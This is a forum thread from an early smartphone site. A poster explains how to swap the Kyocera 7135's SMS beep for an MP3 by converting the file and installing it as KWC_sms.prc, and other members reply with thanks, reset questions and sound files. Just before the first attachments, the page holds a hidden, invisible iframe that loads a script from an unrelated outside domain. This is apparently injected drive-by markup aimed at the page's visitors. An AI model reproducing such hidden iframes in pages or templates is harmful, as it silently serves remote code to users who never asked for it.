+ Reply to Thread
Page 1 of 4 1 2 3 4 LastLast

FAQ: Changing the SMS Messages Beep.... AND other System Sounds!

Question:

Can I customize the SMS Messages "Beep" with a mp3?

Answer:

Yes you can! As soon as I got my 7135 this was one of the first issues I wanted to figure out and I was successful!

Here's what I did to make a MP3 into a "Beep" for the SMS Messages app:

CAUTION: This does involve replacing a default system file! If you create the file incorrectly you may encounter problems--
    be sure you read these directions completely & carefully and feel free to ask questions if you are unsure about what is happening. The original "Beep" can be restored from the ROM by deleting your custom mp3 and then perform TWO soft-resets.

Step 1. Choose your victim: Select the mp3 you wish to make into your SMS Beep. I used the 3 second 64kbps mp3 of the Beatles: "Send me a postcard, Drop me a line!" which I think I downloaded from this forums "7135 Files" section. (Thank you whoever that was! ) I have also tested a 96kbps file, however like the flips and ringers, I wouldn't use a 128kbps just to be safe. Name your file KWC_sms.mp3 - I have included the Beatles version below if you want to skip to Step 3.

Step 2. Prep the patient: This
    is the easy part. Kyocera has already given us the ability to create the file, we just never knew it! Open the Kyocera Mp3maker app on your desktop and browse for the KWC_sms.mp3 file from Step 1 above. Choose "Tone" as the sound type and press "Create". Before you install this file rename the resulting KWC_sms.mp3.pdb to KWC_sms.prc

Step 3. Safety First: In the Messages apps "Incoming
    messages.." settings, select "Disabled" for each option: Pager, Text Msg & Net Alert. You can skip this step during the install as long as you complete Step 5 BEFORE you receive another SMS message.

Step 4. Transplant the file: I used XP to beam it to my 7135, however you can sync it as well. If beamed it should ask you if you want to replace the existing file. Answer yes. Those that use the install tool to hotsync the file will NOT be asked to replace the file. Copying from a SD card will not work -- it will tell you the file on the RAM is not writable. (see discussion below)

Step 5. Make the bypass: In order for the messages app to use the new mp3 file instead of the existing KWC_sms.prc from the ROM you will have to soft-reset TWICE. My unit did not recognize it until after two resets. My guess is one is for the palm-side and the other is for the phone-side. Ether way better safe than sorry.

Step 6. Reverse Step 3: In the Messages apps "Incoming messages.." settings, select "Soft Beep" or "Load Beep" for the options you want to hear the new mp3: Pager, Text Msg & Net Alert.

YOUR ALL SET. Send yourself a Text message, a Page or figure out how to get a Net Alert and you should hear your new mp3 sound instead of the standard Beep.

NOTES: Kyocera obviously did not intend for this to happen so it could cause problems --use at your own risk -- My unit has been running flawlessly for 48 hours with the new beep.

To remove the mp3 SMS beep:

Step A: Perform step 3 above.

Step B: Use file manager or Filez to delete the KWC_sms.prc file. (You may see two of them, but the ROM version will not let you delete it, so find the other one )

Step C: Soft-reset TWICE and then perform step 6. YOU MUST RESEST TWICE before you receive your next SMS or your 7135 will Freeze! I reset ONCE and it still froze, But TWICE removed it perfectly.

-----------------------------------

Have Fun guys -- I know you early adopters have been wanting to do this for a while so I was happy that I could figure it out for you!. Consider this a thanks for sharing all the early-info with us! If you like what you see above, use the "Donate" button at the bottom of any page to contribute to this forum. Solutions like this are not found in the 7135 user manual!!

I currently testing other system "Tone's" as well- I will post my results soon hopefuly. STEVE

WARNING DO NOT INSTALL THE FILE BELOW WITHOUT READING EVERYTHING ABOVE!
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Attached Files
    iPhone therefore iAm.

OK here is the Monty Python SMS file

READ THE FAQ ABOVE FIRST BEFORE INSTALLING THIS FILE OR YOU WILL FREEZE YOUR 7135
    Attached Files
    iPhone therefore iAm.

This one is "Alert Alert" from Star Trek The motion Picture

READ THE FAQ ABOVE FIRST BEFORE INSTALLING THIS FILE OR YOU WILL FREEZE YOUR 7135
    Attached Files
    iPhone therefore iAm.

Steve... I haven't even been able to read through the whole FAQ yet, but already I can proclaim that you are a friggin genius! (now, when are you going to tell us how to use MP3's for other notifications, like new SnapperMail notification alarm, DateBk5 appointment reminders, and all of the other things that use boring sounds? )
    Please visit my picture site: Robert-O-Rama :)

Originally posted by Robert K.
    Steve... I haven't even been able to read through the whole FAQ yet, but already I can proclaim that you are a friggin genius! (now, when are you going to tell us how to use MP3's for other notifications, like new SnapperMail notification alarm, DateBk5 appointment reminders, and all of the other things that use boring sounds? )

How about NOW:

Here's for the Click

http://www.smartphonesource.com/vbul...&threadid=6792

I'm still figurein out the rest but the steps are all the same once you figure out the proper filename and type,if its a "tone" or a "Syst" file.

iPhone therefore iAm.

Originally posted by Steve
    How about NOW:
    Steve, you fargin sneaky bastage! :p
    You da man! :clap

Its the least I can do to make up for all the moaning and groaning I've been doing since I signed up here! -- BUT NOW I HAVE MY OWN 7135!!! Let the FUN Begin!!

When I get around to installing Snappermail I will see how it handles the alert sound-- its not a Kyo app so it may not like the Kyo mp3 interface.. but we can try anyways!
    iPhone therefore iAm.

When I get around to installing Snappermail I will see how it handles the alert sound-- its not a Kyo app so it may not like the Kyo mp3 interface.. but we can try anyways!
    If anybody can figure it out you can! :clap

Absolutly fantastic! Thank you!!!!!

Alan

Way to go Steve!!!!

Steve:

Outstanding.....already have everyone in the office coming in to understand all the "arrows" landing....

Many, many, thanks......you DAH MAN

Ham

quick question, when you reset twice, do you let the first reset complete before pressing the second? or do you press, wait 2 seconds, press?
    Thanks

Thank you Steve!

Awesome!

AWESOME!

Thanks for this discovery! And thanks to the creator of the Monty Python clip.

falstaffpac

Originally posted by Jazzman
    quick question, when you reset twice, do you let the first reset complete before pressing the second? or do you press, wait 2 seconds, press?
    Thanks
    I wait until its finished and brings you to the General Prefs screen (or "Welcome"app if you didnt shut that off) before I perform the second Reset. Still not sure why its two instead of one, but If You don't do it twice it will give a Fatal exception or Freeze. But it works great after the reset from that error --- so by reseting it twice , you save yourself the grief from the get go. I have gotten tons of SMS's today and its been workign great.
    iPhone therefore iAm.

You are all Welcome! I was glad to be of service!

Now that I figured this out I wish I could assign a different mp3 to the "Pages" verus the "Text" messages, But for now, I set the "Pages" on Vibrate so I can tell the difference. ...hmmm I wonder what the "Remind" tone is? hehe If/when I figure it out I'll post my results of course!
    iPhone therefore iAm.

Steve,
    I'm posting this question here since you commented about the "net alert" in your FAQ. What in the world is a "Net Alert"? Does anyone know? The only match I could find while searching this forum refers to a Sprint Carrier and one person's explanation was that it was similar to an SMS sent from Sprint.

http://www.smartphonesource.com/vbul...ight=net+alert

I even RTFM but couldn't find any information.

Thanks,
    falstaffpac

I came to the same conclusin you have -- When I try to look at them in the messages App It tries to access my WAP browser and errors because I haven't set up my WAP access yet --- My guess is the same as yours, its probably something they setup for Carriers to be compatible with thier SMS system for System-wide alerts, When I setup my WAP browser I'll see what it actually does if anything.
    iPhone therefore iAm.

I came to the same conclusin you have -- When I try to look at them in the messages App It tries to access my WAP browser and errors because I haven't set up my WAP access yet --- My guess is the same as yours, its probably something they setup for Carriers to be compatible with thier SMS system for System-wide alerts, When I setup my WAP browser I'll see what it actually does if anything.
    If you have Mobile Web service, and you get an email to your Mobile Web email box, you will get a web alert (at least that is how it worked on my StarTac before VZW switched from thier own service to MSN. I shut down the email address the day they made the switch after receiving 8 pieces of spam to my VZW hotmail address in the first hour.....

Alan

You are all Welcome! I was glad to be of service!

Now that I figured this out I wish I could assign a different mp3 to the "Pages" verus the "Text" messages, But for now, I set the "Pages" on Vibrate so I can tell the difference. ...hmmm I wonder what the "Remind" tone is? hehe If/when I figure it out I'll post my results of course!
    \

Steve

So you have the pages set to vibrate and the text set to an mp3? How do you diiferentiate the two?

Jeff
    Jeff
    Tampa FL
    Blackberry 7230 w/ T-Mobile

E-mail: djjefft@aol.com
    AIM: djjefft

nice!

heres a great one for when youre driving...

hope you like it!
    mike
    Attached Files